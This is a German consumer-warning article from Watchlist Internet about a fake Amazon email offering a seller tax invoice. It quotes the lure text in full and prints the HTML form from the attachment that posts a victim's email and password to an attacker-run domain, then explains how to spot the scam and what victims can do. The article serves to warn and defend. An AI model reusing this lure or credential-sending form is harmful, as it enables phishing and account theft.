Zum Seiteninhalt

News

Amazon-Phishingmail: Rechnung über Ihre Verkäufergebühren

Gepostet am 27.03.2017 um 15:20 Uhr von Watchlist Internet

In einer angeblichen Nachricht von „Europe Amazon“ erhalten Kund/innen die Information, dass ihr „Duplikat der elektronisch erzeugten Steuerrechnung“ verfügbar sei. Sie können es in einem beigefügten Dokument, das den Login-Bereich von Amazon imitiert, herunterladen. Es handelt sich um einen Phishingversuch.

Mit einer gefälschten Amazon-Nachricht versuchen Kriminelle, die Zugangsdaten von Kund/innen zu stehlen. Damit sie das Ziel erreichen, behaupten sie, dass die „elektronisch erzeugten (sic!) Steuerrechnung“ als „Email-Dokument (sic!)“ verfügbar sei. Die Steuerrechnung könne angeblich nur durch Bekanntgabe der Zugangsdaten in einem beigefügten html-Dokument eingesehen werden. Wortwörtlich heißt es in der E-Mail dazu:

Absender: Europe Amazon <messages-marketplace@amazon-europe.com>
Betreff: Rechnung uber Ihre Verkaeufergebuehren bei Amazon.de 03/2017 .

Guten Tag,

Wir werden Ihnen ein Duplikat der elektronisch erzeugten Steuerrechnung für den Monat 02/2017 als ein Email-Dokument senden. Bemerken Sie(nehmen Sie zur Kenntnis) bitte, dass das nicht ein Zahlungsantrag(Zahlungswunsch) ist.

Loggen Sie bitte in zu Ihrem Verkaufskonto in Verkäufer Zentral, Sie werden die Form(Formular) für Ihr Konto per Email geschickt oder um Kopien anderer Steuererklärungen zu bitten, bezahlt zu werden.

Wenn Sie weitere Fragen haben, setzen Sie sich bitte mit unserem Verkaufsdienst in Verbindung.

Blicke(Hinsicht)

Freundliche Grusse
Amazon Europe

Dateianhang: Rechnung-mustermailadresse #25.03.2017.html

Bereits grafisch erweckt die gefälschte Amazon-Phishingmail den Eindruck, unseriös zu sein:


Eine gefälschte Amazon-Phishingmail.

Datenübermittlung an Kriminelle

Empfänger/innen, die den Dateianhang der E-Mail öffnen, um ihre angebliche Steuerrechnung zu sehen, sehen ein html-Dokument, das den Loginbereich von Amazon imitiert Ihre E-Mailadresse ist bereits in einem von zwei Formularfeld eingetragen. Kund/innen müssen nur noch ihr Passwort eingeben und die Schaltfläche „Anmelden“ betätigen.


Eine gefälschte Amazon-Phishingmail.

Das Betätigen der Schaltfläche „Anmelden“ führt den Befehl

<form action="verify.amazon-check.us/verify.php" method="post"><br>
<input id="user" name="user" type="text" value="muster@adresse.at"  required/>
<input id="pass" name="pass" type="password" value=""  required/><br />
<input id="submit" name="submit" type="submit" value="" />

aus. Der Befehl führt dazu, dass Kund/innen die im Formular abgefragten Informationen an Kriminelle senden. Dadurch haben diese Zugang auf das fremde Amazon-Konto und können es für Verbrechen nutzen.

Woran erkennen Sie die Phishingmail?

Die vermeintliche Amazon-Nachricht können Sie unter anderem anhand der nachfolgenden Punkte als betrügerisch erkennen:

  • Amazon versendet kein „Duplikat der elektronisch erzeugten Steuerrechnung“. Damit ist die Nachricht inhaltlich falsch.
  • Als Absender der E-Mail scheint „Europe Amazon“ auf, die dazugehörige E-Mailadresse „messages-marketplace@amazon-europe.com“ gehört jedoch nicht dem Unternehmen: Ein Anonymisierungsdienst aus den USA hat die Domain „amazon-europe.com“ registriert.
  • Die E-Mail weist zahlreiche Fehler auf („Bemerken Sie (nehmen Sie zur Kenntnis) bitte“). Echte Amazon-Nachrichten sind lektoriert und fehlerfrei.
  • Das Schreiben spricht Empfänger/innen nicht persönlich an: „Guten Tag“. Unternehmen kennen ihre Kund/innen und benennen diese mit ihrem Namen.
  • Kund/innen sollen in einem manipulierten Dateianhang ihre Amazon-Zugangsdaten bekannt geben und diese an Unbekannte senden. Das ist ein eindeutiger Hinweis darauf, dass es sich um einen Phishingversuch handelt.

Sie haben das Formular ausgefüllt?

Wenn Sie das Formular der Kriminellen ausgefühlt haben, rufen Sie umgehend die offizielle Amazon-Website auf und ändern darauf das Passwort Ihres Benutzerkontos. Ist das nicht mehr möglich, weil sich die Verbrecher/innen bereits Zugriff zu Ihrem Konto verschafft haben, kontaktieren Sie den Amazon-Kundendienst und besprechen mit ihm das weitere Vorgehen zur Schadensabwehr. Rufen Sie Ihr Kreditkarteninstitut an und lassen Sie  Ihre Kreditkarte sperren. Finden Sie auf Ihren Kontoauszügen nicht von Ihnen autorisierte Abbuchungen, beeinspruchen Sie diese bei Ihrer Bank.

Die Watchlist Internet empfiehlt:

Verschieben Sie vermeintliche Amazon-Nachrichten, die Sie auffordern, persönliche Zugangsdaten in einem Dateianhang bekannt zu geben, in Ihren Spam-Ordner. Bei den E-Mails handelt es sich um einen Phishingversuch. Er zielt darauf ab, das Fremde Zugriff auf Ihr Kundenkonto erlangen!

(Die Watchlist Internet bedankt sich bei Leser/innen für die Meldung der Amazomn-Phishingnachricht.)

Alles zum Thema „Phishing

Bank Austria überprüft keine Identität mit Probe-SMS

In einer gefälschten Bank Austria-Nachricht behaupten Kriminelle, dass Kund/innen ihre Identität mit einer Probe-SMS überprüfen lassen müssen. Dafür ist es notwendig, dass sie auf einer Website ihre Verfügernummer, ihr Passwort und ihre Telefonnummer bekannt geben. Es folgt ein Anruf der Täter/innen, mit dem sie die Bekanntgabe eines TAN-Codes fordern. Der TAN-Code ermöglicht es ihnen, das Geld ihrer Opfer zu stehlen.

weiterlesen

Gepostet am 16.10.2017 um 13:40 Uhr von Watchlist Internet

Vermeintliche Sicherheits-App der Erste Bank ist Schadsoftware

Kriminelle versenden eine gefälschte Erste Bank und Sparkasse-Nachricht. Darin behaupten sie, dass das Konto von Kund/innen eingeschränkt worden sei und sie zur weiteren Benutzung eine Sicherheits-App installieren müssen. Die angebliche Sicherheits-App ist Schadsoftware. Wer sie installiert, ermöglicht Kriminellen Zugriff auf das eigene Konto.

weiterlesen

Gepostet am 10.10.2017 um 15:26 Uhr von Watchlist Internet

Gefälschte Apple-Nachricht: Subscription Confirmation

Kriminelle versenden eine gefälschte Apple-Nachricht. Darin behaupten sie, dass Empfänger/innen eine teure Anwendung gekauft haben. Sollte das nicht der Fall sein, können sie die Bestellung auf einer Website stornieren. Apple-Kund/innen, die den angeblichen Einkauf rückgängig machen wollen, übermitteln ihre Kreditkartendaten an Betrüger/innen.

weiterlesen

Gepostet am 25.09.2017 um 11:14 Uhr von Watchlist Internet

Gefälschte Apple-Nachricht fordert Kontoaktivierung

Kriminelle versenden eine gefälschte Apple-Nachricht. Darin behaupten sie zu Unrecht, dass die Apple-ID von Kund/innen gesperrt worden sei. Damit sie diese wieder aktivieren können, sollen Kund/innen persönliche Daten und ihre Kreditkarteninformationen auf einer gefälschten Apple-Website bekannt geben. Es handelt sich um einen Phishingversuch!

weiterlesen

Gepostet am 13.09.2017 um 12:13 Uhr von Watchlist Internet

Gefälschte GMX-Nachricht: Konto gesperrt

Kriminelle versenden eine gefälschte GMX-Nachricht mit dem Betreff „GMX Konto Gesperrt“. Darin behaupten sie, dass das E-Mailkonto der Empfänger/innen gelöscht werde. Kund/innen, die das verhindern wollen, sollen ihre Zugangsdaten auf einer gefälschten GMX-Website bekannt geben. Dadurch erlangen die Kriminellen Zugriff auf die Kundenkonten ihres Opfer.

weiterlesen

Gepostet am 07.08.2017 um 15:19 Uhr von Watchlist Internet

Gefälschte Bank Austria-Nachricht: Änderungen im OnlineBanking

In einer gefälschten Bank Austria-Nachricht schreiben Kriminelle, dass es zu einer Änderung im OnlineBanking-System gekommen sei. Das führt zu Fehlern, weshalb Kund/innen ihre Zugangsdaten auf einer Website nennen sollen. Empfänger/innen der Nachricht, die dem nachkommen, übermitteln ihre Passwörter an Verbrecher/innen.

weiterlesen

Gepostet am 03.08.2017 um 10:59 Uhr von Watchlist Internet

Unterstützt von:

Ein Projekt des:

Internet Ombudsmann